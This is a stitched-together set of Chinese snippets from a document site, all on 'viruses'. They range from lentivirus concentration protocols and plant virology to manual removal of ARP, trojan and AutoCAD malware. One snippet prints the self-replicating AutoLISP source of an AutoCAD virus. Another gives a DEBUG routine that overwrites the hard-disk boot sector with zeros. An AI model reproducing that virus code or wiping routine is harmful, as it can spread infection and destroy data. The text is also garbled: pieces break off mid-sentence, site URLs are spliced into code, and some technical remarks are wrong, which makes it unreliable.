病毒纯化浓缩方法
病毒纯化浓缩方法
方法一超速离心沉淀法
1 仪器
超速离心机(BECKMAN OPTIMAL-80XP) 50000~80000rpm相对离心力最大可达510000×g;高速冷冻离心机(BECKMAN AVANTIJ-26XP)20000~25000rpm 最大离心力为89000×g;超速离心管 (Beckman 344058),Ultra-clear SW28离心管
2 方法步骤
(1)转染后44-48小时,收集上清液到50ml离心管内,并加入20ml Production 培养基以便第二轮病毒的收集。将收集的上清液4℃,4000g离心10分钟,去除细胞碎片,然后0.45 μm滤膜过滤到40ml超速离心管中。
(2)取6个Beckman超速离心管,70%乙醇清洗后在生物安全柜中风干并紫外消毒30min。
(3)每个Ultra-clear SW28管加入30ml 预先处理过滤过的病毒上清。
(4)取一支10ml的移液管,吸取12 ml 20%的蔗糖溶液(PBS配制)。将移液管一直插入到离心管的底部,缓慢将蔗糖溶液打出4 ml,形成一个蔗糖垫。同样地,将剩下8 ml的蔗糖溶液分别加入到另两个离心管中。另取一支干净的移液管,对剩下3管进行同样处理。
(5)务必确定离心管没有裂缝且用PBS调整各管重量使两两平衡。
(6)4℃离心,25000rpm (82700g)2 h。
(7)离心完毕后小心取出超速离心管,小心弃去上清液,留下管底沉淀。管底可见少量的半透明或白色沉淀。将超速离心管倒置在吸水纸上晾干约10min,并用Tip头吸去管壁上多余的液体。
(8)每管中加入100ul不含钙和镁的冷PBS洗下沉淀。
(9)将SW28超速离心管插入到50ml锥底离心管中,盖上盖子。
(10)在4℃溶解2小时,每隔20分钟轻轻震荡。
(11)4℃,500g离心1分钟,使溶液集中于管底。
(12)用200μl 移液器轻柔吹打使沉淀重悬。避免产生泡沫。将所有管中的液体集中到一个SW28离心管中,分装50ul/管,保存于成品管中,用碎干冰速冻后储存在-80℃冻存。
方法二 PEG-8000浓缩法
(1)5X PEG8000+NaCl配制称取NaCl 8.766 g; PEG8000 50g溶解在200ml Milli-Q纯水中;121摄氏度 30min 湿热灭绝 30min;保存在4℃。
(2)使用0.45μm滤头过滤慢病毒上清液;
(3)每30ml过滤后的病毒初始液,加入5X PEG-8000+NaCl母液7.5 ml;
(4)每20~30min混合一次,共进行3-5次;
(5)4度放置过夜;
(6)4度,4000 g,离心 20min;
(7)吸弃上清,静置管子1~2分钟,吸走残余液体;
(8)加入适量的慢病毒溶解液溶解慢病毒沉淀;
(9)集中后的病毒悬液分装成50 μl每份,保存在成品管中。用碎干冰速冻后储存在-80 ℃
方法三慢病毒纯化浓缩试剂盒
1. 每10ml过滤后的病毒初始液,加入Concen Solution 3ml,每20-30min混合一次,共进行3-5次。
2.2. 4℃放置过夜。
3. 4℃,3000 g,离心45min。
4. 去掉上清,静置管子1-2min,吸走残余液体。
5. 加入无血清DEME充分溶解慢病毒沉淀。
6. 病毒悬液分装成200μl每份,保存在离心管中,速冻后储存在-80 ℃。
病毒的分离纯化
病毒的分离纯化 我设计了一套方案,请大家批评指正: 1. 新鲜病叶200g,-70℃冰冻30分钟,以2倍体积0.2mol/L磷酸缓冲液(PH7.5,含0.1%巯基乙醇,2%TritionX-100,0.01mol/LEDTA)。组织捣碎机捣碎,双层纱布过滤。 2. 滤液中加入等体积的氯仿,冰浴激烈搅拌15分钟,充分乳化后2000 g离心15分钟 3. 上清液中加入6%聚乙二醇-6000,3%Nacl,0.5%TritionX-100(W/V)。冰浴搅拌,4℃下过夜,次日取出10000g离心20分钟。 4. 沉淀悬浮于0.02mol/L磷酸缓冲液(PH7.2,2%TritionX-100, 0.1%巯基乙醇,1mol/L尿素),2小时后,2000g离心10分钟。 5. 上清液中加入6%聚乙二醇-6000,3%Nacl,0.5%TritionX-100(W/V)。冰浴搅拌4小时,10000g离心30分钟。 6. 沉淀悬浮于0.02mol/L磷酸缓冲液(PH 7.2,2%TritionX-100,0.01mol/LEDTA,1mol/L尿素),4℃下4小时后,10000g离心10分钟。 7. 上清用10%~40%蔗糖密度梯度离心(30000r/min,1.5h),收集病毒带,用0.02mol/L磷酸缓冲液(PH7.2,2%TritionX-100, 0.1%巯基乙醇,1mol/L尿素)稀释,123000g离心2小时。 8.沉淀用0.02mol/L磷酸缓冲液(PH7.2,2%TritionX-100, 0.1%巯基乙醇,1mol/L尿素)悬浮,5000g离心15分钟,上清即为提纯病毒制品。 lf_12345
ARP病毒彻底清除方法
最近流行的ARP病毒彻底清除方法 1、删除”病毒(一种具有隐蔽性破坏性传染性的恶意代码)组件释放者”程序: “%windows%\System32\LOADHW.EXE”(window xp 系统目录为:“C:\WINDOWS\Syst em32\LOADHW.EXE”) 2、删除”发ARP欺骗包的驱动(驱动程序即添加到操作系统中的一小块代码,其中包含 有关硬件设备的信息)程序” (兼“病毒(一种具有隐蔽性破坏性传染性的恶意代码)守护程序”): “%windows%\System32\drivers\n pf.sys”(window xp 系统目录为:“C:\WINDOWS\Syste m32\drivers\npf.sys”) 2、npf.sys病毒手工清除方法 3、病毒的查杀有很多种方式,下面就让我们来介绍一下手工查杀的方法。 4、npf.sys(%system32/drivers/npf.sys)是该npf病毒主要文件,病毒修改注册表创建系统服务 NPF实现自启动,运行ARP欺骗,在病毒机器伪造MAC地址时,不停地向各个机器发送ARP包堵塞网络,使得传输数据越来越慢,并且通过伪掉线来使用户重新登陆游戏,这样它就可以截取局域所有用户登陆游戏时的信息数据。 5、该病毒往往造成网络堵塞,严重时造成机器蓝屏!!!!。开始杀毒: 6、1.首先删除%system32/drivers/下的npf.sys文件 7、2.进入注册表删除 8、HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Npf服务。 9、同时删除 10、HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Enum/Root/LEGACY-NPF 11、HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Enum/Root/LEGACY-NPF 12、 3.删这两键时,会提示无法删除,便右键,权限,设everyone控制,删除。 13、 14、 a. 在设备管理器中, 单击”查看”-->”显示隐藏的设备” b. 在设备树结构中,打开”非即插即用….” c. 找到“NetGroup Packet Filter Driver”或“NetGroup Packet Filter” ,若没找到,请先刷新设 备列表 d. 右键点击“NetGroup Packet Filter Driver”或“NetGr oup Packet Filter”菜单,并选择”卸 载” e. 重启windows系统 f. 删除“%windows%\System32\drivers\npf.sys”(window xp系统目录为:“C:WINDOWS\ System32\drivers\npf.sys”) 3、删除”命令驱动(驱动程序即添加到操作系统中的一小块代码,其中包含有关硬件设 备的信息)程序发ARP欺骗包的控制者”
CAD病毒处理方法
一、中键不能用的病毒 步骤:1、关闭cad程序,显示所有文件和文件夹;显示已知程序的后缀; 2、搜索acad.lsp,全部彻底删除; 3、搜索acadappp.lsp,一般就一个,彻底删除(注意搜索要在高级选项加上隐藏文件夹); 4、打开cad,在工具--选项--配置--重置,再试一下,ok了吧!!! 二、时间病毒 手工清除方法:首先请关闭CAD后,再搜索所有磁盘内的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件,(记住一定要搜索完所有的磁盘,如C、D、E、F、G等等。)然后将所有搜索到的acad.fas、acad.sys、acad.ini、lcm.fas、dwgrun.exe、dwgrun.bat、winsys.ini、winfas.ini文件全部删除。 常见问题是C:\Program Files\autocad***目录(子目录)下的 acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除! 不想进去目录查找也可以输入下面的字符到CAD命令行: (while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a)) 注意:上面带括号一个字都不能少哦!这样就行了! 如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行?: (setvar "mtexted" ".") 靠,玩cad就指这个混了,全部贡献了。!!!!! 要把你的机子、U盘全部照上面的方法查一遍,以后见到acad.lsp这个东西先删!!! 只要在同一个文件夹中(不论是U盘还是硬盘)有图纸和acad.lsp,打开任何图纸之后就会在C盘产生一个acadappp.lsp病毒母文件,以后在这台机子任意打开图纸,就会在打开图纸的文件夹中产生一个acad.lsp文件,说白了就是中毒了!!!!按我上面的方法处理染毒的机子就ok了!并不存在某个文件安全不安全的讲法,只存在.dwg文件安全不安全的讲法
彻底清除计算机病毒的简便方法
彻底清除计算机病毒的简便方法 目前,彻底清除计算机病毒的常用方法是:先对硬盘进行低级格式化,然后分区,最后高级格式化。这种做法不仅费时,而且也损伤硬盘。那么能否既不需要对硬盘进行低级格式化,又能彻底清除计算机病毒呢?笔者经过实践,认为答案是肯定的。因为引导型病毒主要是驻留在硬盘0柱面0磁头1扇区开始的引导区内,只要把硬盘引导区的内容全部清零,即可达到清除引导型病毒的目的。 这可用DEBUG命令编写一段小程序,并把它写入一个干净的DOS系统盘上,这种程序的功能是把硬盘引导区内所有字节全部清零,从而在清除硬盘引导区全部数据的同时也清除含在其中的病毒代码。 由于该程序很短,可用无毒DOS系统盘启动计算机后调用该盘0的DEBUG命令编写的如下一段程序并把它写入磁盘,具体操作为: A:\>DEBUG -A100 0100 MOV CX,0200 ;清除1个扇区(512个单元) MOV DI,0200 ;内存起始地址为0200H,送于DI寄存器中 MOV AL,00 ;把立即数00存放到寄存器AL中 0108 MOV [DI],AL ;把AL中的数据写入DI所指的内存单元中 INC DI ; 内存地址加1 DEC CX ; 内存单元个数减1
JNZ 0108 ;不为零转移 MOV AX,0301 ;AH=03是写盘,AL=01是写入一个扇区 MOV BX,0200 ;BX=0200是从内存0200H处开始读数据 MOV CX,0001 ;LH=00为0磁头,CL=01为第一个扇区 MOV DX,0080 ;DH=00为0柱面,DL=80为硬盘 INT 13 ;调用DOS软中断之硬盘读写控制程序 011D INT 20 ;程序运行结束 -N A: https://www.wendangku.net/doc/502750612.html,;给文件命名,意为:对C盘引导区填满零 -BBX BX 0000 :00 -RCX CX 0000 :ID ;输入文件长度10个字节 -W ;写盘 Writing 0001D bytes -Q A:\> 至此,清除硬盘引导区程序https://www.wendangku.net/doc/502750612.html,已建立在A盘上。 为了确保计算机能真正做到干净无毒,除了应清除硬盘引导区病毒外,还应清除驻留在CMOS 芯片里的病毒。否则,当计算机启动读取CMOS信息时,病毒将从CMOS芯片中被引入到内存
病毒分离方法
植物内生菌分离方法 植物内生菌分离方法 匿名提问 2009-02-18 20:04:53 发布 自然科学学术 6个回答 回答 曲恋| 2009-02-18 20:45:40 有0人认为这个回答不错| 有0人认为这个回答没有帮助 植物内生放线菌是一类大有开发潜力的微生物资源。目前使用的分离条件和技术尚不完善,容易被外源菌和内生真菌、细菌污染,因此内生放线菌尤其是稀有内生放线菌的选择性分离技术至少是今后一段时间研究的重点。介绍了植物内生放线菌选择性分离方法并提出值得研究的问题。( 添加评论(0) nk0226 | 2009-07-25 11:13:09 有0人认为这个回答不错| 有0人认为这个回答没有帮助 植物病毒与病毒防治 Plant Virology& Control of Plant Virology 32学时2学分 一、课程性质、地位和任务 植物病毒与病毒防治是研究病原病毒与植物病毒病害相互关系的生物学科。本课程重点讲授植物病毒相关生物学特性与研究进展:病毒侵染寄主植物生理效应与抗病免疫;植物亚病毒病原等基础理论知识。同时,根据植物病毒基础研究需要,课程理论讲授与实验技能训练并重。通过本课程的学习,使学生进一步熟悉病毒病原与其它相关病原的区别要点,病害宏观及微观鉴定基本技术、方法、手段,并能在实践中应用。为独立开展植物病毒及病毒病害研究奠定基础。 二、课程教学的基本要求 要求学生重点掌握以下内容: (1)植物病毒的传播途径及传毒机制;
(2)病毒侵染植物内部症状,侵染增殖过程; (3)植物受病毒侵染的生理效应与抗病免疫; (4)植物亚病毒病原的基本特性; (5)植物病毒与病毒病害诊断鉴定的程序与方法。 三、课程理论教学大纲及学时分配 1. 绪论(2学时) 1.1 病毒的发现与病毒学的发展 1.2 研究病毒的意义与任务 1.3 植物病毒与其他病毒的关系 1.4病毒与其他微生物的区别 2. 病毒的分类与命名(3学时) 主要介绍病毒分类和命名的基本原则相关指标。重点:植物病毒的命名和分类系统。 2.1 病毒命名和分类的发展 2.2 病毒命名的系列 2.3 病毒分类的系列 2.4 植物病毒的命名和分类系统 3. 病毒侵染植物与增殖与增殖过程及遗传与变异(5学时) 主要讲授植物病毒侵染方式,在寄主体内的增殖过程,病毒遗传变异的本质。难点:病毒进入寄主细胞的方式及粒体装配。 3.1病毒粒体的吸附与侵入 3.2病毒粒体的脱壳与生物合成 3.3病毒粒体的装配与释放 3.4病毒的遗传与变异 3.5病毒的体外重新组与生物活性 4. 植物病毒的传播途径及传毒机制(5学时) 主要讲授病毒的介体传播和非介体传播的两大途径,以及不同介体传播机制与病害发生流行关系,难点:介体持久性传毒(口针传毒)与非持久性传毒(巡回传毒)机理。 4.1介体传毒 4.2非介体传毒 4.3种子与花粉传毒 4.4传毒机制 5. 病毒侵染植物生理效应与抗病免疫(5学时) 主要介绍病原侵染植物的内部症状(内含体)、病毒在植物体内的运转及生理活性物质改变与寄主抗病机理。难点:病毒侵染植物的生理变化与寄主的免疫反应。 5.1病毒侵染植物内部症状(内含体及其类型) 5.2病毒在植物体内的运输
手工清理病毒原来可以如此简单
手工清理病毒原来可以如此简单 2007-12-14来源: 进入论坛 编者按:当大家看到这个题目的时候一定会觉得手工杀毒真的很简单吗?笔者写这个文章的目的就是让所有菜鸟在面对病毒的时候能轻而易举的狙杀掉它,而不是重装系统,或者在重装N次系统以后无奈的选择格式化,结果却依然无法将讨厌的病毒驱逐出你可怜的电脑。今天我们以今年泛滥比较严重的病毒之一的“AV终结者”的手工清理方法来像大家讲述如何手工清理这类非感染exe文件类型的病毒(本次讲述的办法在清理完病毒源头以后借助专杀工具依然可以适用于清理感染exe类病毒)。 第一步:知己知彼,百战百胜 要战胜AV终结者,我们先要了解自己的处境和它的特性还有弱点。首先我们来了解下AV终结者的执行以后的特征: 1.在多个文件夹内生成随机文件名的文件 旧版本的AV终结者在任务管理器里可以查看2个随机名的进程,新的变种文件名格式发生变化,目前我遇到过2种。 一种是随机8个字母+数字.exe和随机8个字母+数字.dll;另一种是6个随机字母组成的exe文件和inf文件。不管变种多少它们保存的路径大概都是如下几个: C:\windows C:\windows\help C:\Windows\Temp C:\windows\system32 C:\Windows\System32\drivers C:\Program Files\ C:\Program Files\Common Files\microsoft shared\ C:\Program Files\Common Files\microsoft shared\MSInfo C:\Program Files\Internet Explorer 以及IE缓存等 这个是我个人总结出来的,随着病毒的变种。获取还有其他的。我这里只提供参考。 2.感染磁盘及U盘 当你的系统中了AV终结者,你会发现你的磁盘右键打开时将出现一个”Auto”也就是自动运行的意思,此时你的电脑已经中毒了,而且如果你这个时候企图插入移动硬盘、U盘,或者刻录光盘以保存重要资料,都将被感染。这也就为什么许多用户重装完系统甚至格式化磁盘以后病毒依然的原因。 当你重装完系统,必定会有双击打开硬盘寻找软件或者驱动的时候,这个时候寄生在你磁盘根目录内的Autorun.inf文件就起到让病毒起死回生的功能了。这绝对不是耸人听闻哦! 3.破坏注册表导致无法显示隐藏文件 我们一起来看看磁盘里的Autorun.inf,因为此时你的系统已经无法显示隐藏文件了。这个也是AV终结者的一个特征,所以我们这里用到几条简单的dos命令。 开始菜单-运行-输入“cmd”来到cmd界面,输入“D:” 跳转到D盘根目录,因为AV是不感染C盘根目录的,再输入“dir /a”显示D盘根目录内的所有文件及文件夹。“/a”这个参数就是显示所有文件,包含隐藏文件。如图:
计算机中病毒的处理办法
计算机病毒处理常用办法 1、预防病毒的好习惯 1)建立良好的安全习惯。 对一些来历不明的邮件及附件不要打开,不要上一些不太了解的网站、不要执行从Internet 下载后未经杀毒处理的软件,不要共享有读写权限的文件夹或磁盘,机器间文件的拷贝要先进行病毒查杀; 2)经常升级安全补丁。 一部分病毒是通过系统安全漏洞进行传播的,像红色代码、尼姆达、SQL Slamer、冲击波、震荡波等病毒,我们应密切关注病毒、漏洞预警,即使修补系统漏洞补丁; 3)使用复杂的用户口令。 有许多病毒是通过猜测用户口令的方式攻击系统的。因此使用复杂的口令,会提高计算机的病毒防范能力;一般来讲,复杂的口令须具备:长度8位或8位以上,口令中必须含字母、数字而且字母分大小写; 4)迅速隔离受感染的计算机。 当计算机发现病毒或异常时应立刻断网,以防止计算机受到更多的感染,或者成为传播源; 5)了解一些病毒知识。 这样可以及时发现新病毒并采取相应措施,使自己的计算机免受病毒破坏。如果能了解一些注册表知识,就可以定期看一看注册表的自启动项是否有可疑键值;如果了解一些内存知识,就可以经常看看内存中是否有可疑程序。 6)安装专业的防毒软件进行全面监控。 在病毒日益增多的今天,应该使用防病毒软件进行病毒防范,在安装了防病毒软件之后,还要经常进行病毒库的升级,并打开实时监控(如文件双向监控)器进行监控。 2、怎样区别计算机病毒与故障 在清除计算机病毒的过程中,有些类似计算机病毒的现象纯属由计算机硬件或软件故障引起,同时有些病毒发作现象又与硬件或软件的故障现象相类似,如引导型病毒等。这给用户造成了了困惑,许多用户往往在用各种病毒软件查不出病毒时就去格式化硬盘,不仅影响了工作、减少了硬盘的寿命,而且还不能从根本上解决问题。所以,有必要正确区分计算机的病毒与故障,下面的经验供用户参考: 1)计算机病毒的现象 在一般情况下,计算机病毒总是依附某一系统软件或用户程序中进行繁殖和扩散,病毒发作时危及计算机的正常工作,破坏数据与程序,侵犯计算机资源。计算机在感染病毒后,往往有一定规律性地出现一些异常现象,比如: A. 屏幕显示异常。屏幕显示出不是由正常程序产生的画面或字符串, 出现显示混乱现象; B. 程序装载时间明显增长, 文件运行速度显著下降; C. 用户没有访问的设备出现异常工作信号; D. 磁盘出现莫名其妙的文件和坏块, 卷标发生变化; E. 系统自行引导; F. 丢失数据或程序, 文件字节数发生变化; G. 内存空间、磁盘空间异常减小; H. 异常死机或自动重启; I. 磁盘访问时间比平时明显增长; J. 系统引导时间明显增长。 2)与病毒现象类似的硬件故障 硬件的故障范围不太广泛,比较容易确认,但在处理计算机异常现象时易被忽略。排除硬件故障是解决问题的第一步。
第25章 病毒感染的检查方法
第25章病毒感染的检查方法 与防治原则 第一节病毒的诊断 随着对病毒感染从生物学及分子生物学水平的研究进展,病毒的诊断技术已由传统方法扩展至新的快速诊断技术。病毒感染的快速诊断有利于对病毒感染者的治疗;例如对有些病毒(如疱疹病毒、人类免疫缺陷病毒)感染已有较特异的抗病毒药物治疗。早期诊断及早期治疗对控制病毒感染十分重要。此外,从群体感染角度分析,确诊病毒感染的病原在监测病毒的流行病学(如新型流感病毒、肺出血型汉坦病毒的发现等)方面也有重要的现实意义。 标本的采集与送检用于分离病毒或检测病毒及其核酸的标本应采集病人急性期标本。根据不同病毒感染采取不同部位的标本(如鼻咽分泌物、脑脊液、粪便或血液)。由于病毒在室温中很易被灭活,应在采集和运送标本中注意冷藏。如欲检测抗体,早期单份血清可用于检测IgM抗体,而欲检测早期与恢复期的抗体效价的变化,则需采集早期与恢复期双份血清。血清抗体检测标本应保存于-20℃。 病毒的分离、培养与鉴定目前最常用的方法是细胞培养。在注明欲检测的病毒后,病毒分离培养的实验室将选择适当的原代培养细胞(敏感性高)及传代细胞系(便于在实验室保存)作病毒分离培养。接种标本后,细胞可出现病变或也可并不出现病变而需用血细胞吸附等方法检测是否有病毒增殖,并进一步还需用特殊的抗体鉴定病毒的种类,例如用特异荧光抗体染色或抗体中和试验等。当无病毒增殖时,可能标本中病毒含量较低,未被检出,则需要盲目传代3次后方可明确标本中是否存在病毒。这一分离与鉴定病毒的全过程有时可长达2~3个月,而且仅在有设备、实验条件及合格工作人员的实验室方可进行。虽然这种方法所需时间长、步骤多,但在确定病原上是“黄金标准”,即其准确性高而无误。如我国台湾省确定由肠道病毒71型引起多数患儿发生脑膜炎并致死的研究报道,就是由分离培养及鉴定病毒所确诊。如欲提高病毒感染细胞培养的敏感性,可将病毒接种于内有盖玻片的细胞培养瓶,经低温离心后,以增加病毒与细胞接触的机率。再将盖玻片进行培养,并用单克隆抗体染色,藉以通过检测病毒的早期抗原进行诊断。 在流感病毒的分离培养中,最敏感而特异的方法是鸡胚接种,并用血凝和血
常见木马病毒清除的方法
常见木马病毒清除的方法 来源:互联网 | 2009年09月23日 | [字体:小大] | 网站首页 由于很多新手对安全问题了解不多,所以并不知道自己的计算机中了“木马”该怎么样清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”,但它们并不能防范新出现的“木马”程序,因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。相信你看了这篇文章之后,就会成为一名查杀“木马”的高手了。 “木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。 在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan 木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。 在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。 在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表 “HKEY-LOCAL-MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun”下的Explorer 键值改为Explorer=“C:WINDOWSexpiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。 当然在注册表中还有很多地方都可以隐藏“木马”程序, 如:“HKEY-CURRENT-USERSoftwareMicrosoftWindowsCurrentVersionRun”、“HKEY-USERS****SoftwareMicrosoftWindowsCurrentVersionRun”的目录下都有可能,最好的办法就是在
一种CAD病毒的清除与防范措施
一种CAD病毒的清除与防范措施 雪山飞猪 QQ534455 近来又出现一种AutoCAD病毒,该病毒与以往CAD病毒不同。干净的CAD 系统当打开DWG图时,如果该图所在目录下有ACADDOC.LSP文件(基本为病毒传播文件),ACADDOC.LSP就会运行。 1.病毒的特征与传播方式 我们先看看病毒代码,代码如下: (setq flagx t) (setq bz "(setq flagx t)") (defun app(source target bz / flag flag1 wjm wjm1 text) (setq flag nil) (setq flag1 t) (if (findfile target) (progn (setq wjm1 (open target "r")) (while (setq text (read-line wjm1)) (if (= text bz) (setq flag1 nil)) );while (close wjm1) );progn );if (if flag1 (progn (setq wjm (open source "r")) (setq wjm1 (open target "a")) (write-line (chr 13) wjm1) (while (setq text (read-line wjm)) (if (= text bz) (setq flag t)) (if flag
(progn (write-line text wjm1) );progn );if );while (close wjm1) (close wjm) );progn );if );defun (setvar "cmdecho" 0) (setq acadmnl (findfile "acad.mnl")) (setq acadmnlpath (vl-filename-directory acadmnl)) (setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist)) (setq acadexe (findfile "acad.exe")) (setq acadpath (vl-filename-directory acadexe)) (setq support (strcat acadpath "\\support")) (setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist)) (setq dwgname (getvar "dwgname")) (setq dwgpath (findfile dwgname)) (if dwgpath (progn (setq acaddocpath (vl-filename-directory dwgpath)) (setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0) (while (< mnln mnlnum)
计算机病毒的传播方式以及应对方法
计算机病毒的传播方式以及应对方法 摘要:目前计算机的应用遍及到社会各个领域,同时计算机病毒也给我们带来了巨大的破坏力和潜在威胁,为了确保计算机系统能够稳定运行以及信息的安全性,了解计算机病毒的一些特征、传播方式及防范措施十分必要。 关键词:计算机病毒分类传播方式预防查杀 一、计算机病毒的定义: 一般来讲,凡是能够引起计算机故障,能够破坏计算机中的资源(包括软件和硬件)的代码,统称为计算机病毒。它通常隐藏在一些看起来无害的程序中,能生成自身的拷贝并将其插入其他的程序中,执行恶意的行动,其具有以下几个特点: 1、传染性。计算机病毒会通过各种渠道从被感染的计算机扩散到未被感染的计 算机,在某些情况下造成被感染计算机工作失常甚至瘫痪。 2、潜伏性。有些计算机病毒并不是一侵入机器就对机器造成破坏,它可能隐藏 在合法的文件中,静静的呆几周或者几个月甚至几年,具有很强的潜伏性,一旦时机成熟就会迅速繁殖、扩散。 3、隐蔽性。计算机病毒是一种具有很高编程技巧、短小精悍的可执行程序,如 不经过程序代码分析或计算机病毒代码扫描,病毒程序与正常程序很难区分开来。 4、破坏性。任何计算机病毒侵入到机器中,都会对系统造成不同程度的影响, 轻者占有系统资源,降低工作效率,重者数据丢失,机器瘫痪。 除了上述四个特点,计算机病毒还具有不可预见性、可触发性、衍生性、针对性、欺骗性、持久性等特点。正是由于计算机具有这些特点,给计算机病毒的预防、检测和清除工作带来了很大的麻烦。 二、计算机病毒的分类: 1、系统病毒。系统病毒的前缀为: Win32 、PE、Win95 、W3 2、W95 等。这种 病毒的公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。 2、蠕虫病毒。蠕虫病毒的前缀是:Worm 。这种病毒的公有特性是通过网络或者 系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。 3、木马病毒。木马病毒其前缀是:Trojan,它是一种会在主机上未经授权就自 动执行的恶意程序。木马病毒通过网络或者系统漏洞进入用户的系统并隐藏,然后向外界泄露用户的信息,对用户的电脑进行远程控制。 4、Arp病毒。Arp病毒也是一种木马病毒,它是对利用Arp协议漏洞进行传播的 一类病毒的总称。由于其在局域网中威胁比较大,所以单独列举一下。此病毒通过路由欺骗或网关欺骗的方式来攻击局域网,使用户电脑无法找到正确的网关而不能上网。 5、后门病毒。后门病毒的前缀是:backdoor。该类病毒的公有特性是通过网络 传播,给系统开后门,给用户电脑带来安全隐患。
病毒的分离方法.doc
病毒的分离方法 一般情况下分离病毒可以用传代细胞、原代细胞或者直接用动物接种或者鸡胚接种,只有在找不到适合病毒生长的原代细胞或者传代细胞的情况下才运用动物接种或者鸡胚接种的方法分离病毒。 大致过程应该是这样的: 第一获取病毒分离样品,这个要求比较高,采集后如果不能立即操作则必须低温保存,并尽快送实验室操作。另外也可以冷冻保存,一般情况下病毒是不容易冻死的。当然某些特殊病毒除外,这需要查阅相关资料。 第二病毒分离操作,将获取病样研磨,并冻融至少一次,当然研磨过程中必须低温。同时研磨应充分,在研磨时可以加入生理盐水或PBS或者直接加细胞培养液,研磨完全后冻融一到三次,冻融的目的是为了让细胞完全破裂将细胞内的病毒释放到溶液中。然后低速离心,取上清用0.22微米的滤膜过滤,去过滤后的液体接种细胞。此时须注意,并不是所有病毒接种是都需要让细胞完全长满细胞瓶,一般是不能产生细胞病的病毒最好在细胞长到40%左右接种,而能产生细胞病变的则需要完全长满细胞瓶以后再接种病毒。接种过程中为避免污染可以加入双抗,或者其他抗生素。 第三接种后观察,某些能产生细胞病变的病毒很容易观察,直接在显微镜下就能看是否分离成功;如果病毒不产生细胞病变,则需要用其他的方法来检测,比如可用荧光抗体染色、PCR或者其他方法。不过大部分情况下第一代都不容易看到或者效果不好,这时你可以再传几代试试。如果再传四~五代以后都没有的话,那恭喜你,你失败了,或者你的方法有问题,或者根本就没有你要分离的病毒,或者在分离过程中你的病毒就已经死了。 用细胞分离病毒大概就是这个过程,当然某些病毒可能还没有相应的传代或者原代细胞,如果要分离就只能用易感动物了,操作都是相似的,无非都是采样、样品处理、接种、接种后检测观察、收集病毒而已。上面说到的方法都是从动物组织中分离,当然如果不是组织,比如你要从粪便或者尿液或取的拭子上分离,则可直接将其用生理盐水、PBS或细胞培养液稀释(要尽量摇匀如果是拭子的话应多挤压摇匀)然后离心取上清过滤接种细胞就可以了。
恶意插件务必清除,介绍几种手工清除方法
20种恶意插件手工清除方法 如今,恶意软件及插件已经成为一种新的网络问题,恶意插件及软件的整体表现为清除困难,强制安装,甚至干拢安全软件的运行。下面的文章中就给大家讲一部份恶意插件的手工清除方法,恶意插件实在太多,无法做到一一讲解,希望下面的这些方法能为中了恶意插件的网友提供一定的帮助。 1、恶意插件Safobj 相关介绍: 捆绑安装,系统速度变慢,没有卸载项/无法卸载,强制安装,干扰其它软件正常运行, 清除方法: 重新注册IE项,修复IE注册。从开始->运行 输入命令 regsvr32 actxprxy.dll 确定 输入命令 regsvr32 shdocvw.dll 确定 重新启动,下载反间谍专家查有没有ADWARE,spyware,木马等并用其IE修复功能修复IE和注册表,用流氓软件杀手或微软恶意软件清除工具清除一些难卸载的网站插件。 到https://www.wendangku.net/doc/502750612.html,下载KillBox.exe。在C:\Program Files\Internet Explorer\目录下,把LIB 目录或Supdate.log删除。 跳窗网页可能保留在HOSTS,一经上网就先触发该网址为默认,就会自动打开,检查HOSTS: 用记事本在C:\WINDOWS\system32\drivers\etc\目录下打开HOSTS 在里面检查有没有网址,有则删除。 或在前面加 127.0.0.1 保存后屏蔽掉。 如果是弹出的信使: 从开始->运行,输入命令: net stop msg net stop alert 即终止信使服务。 2、恶意插件MMSAssist 相关介绍: 这其实是一款非常简便易用的彩信发送工具,但它却属于流氓软件!并采用了类似于木马的Hook(钩子)技术,常规的方法也很难删除它,而且很占用系统的资源。 清除方法: 方法一:它安装目录里第一个文件夹有个.ini文件,它自动从 https://www.wendangku.net/doc/502750612.html,/updmms/mmsass.cab下载插件包,包里有albus.dll文件,UPX 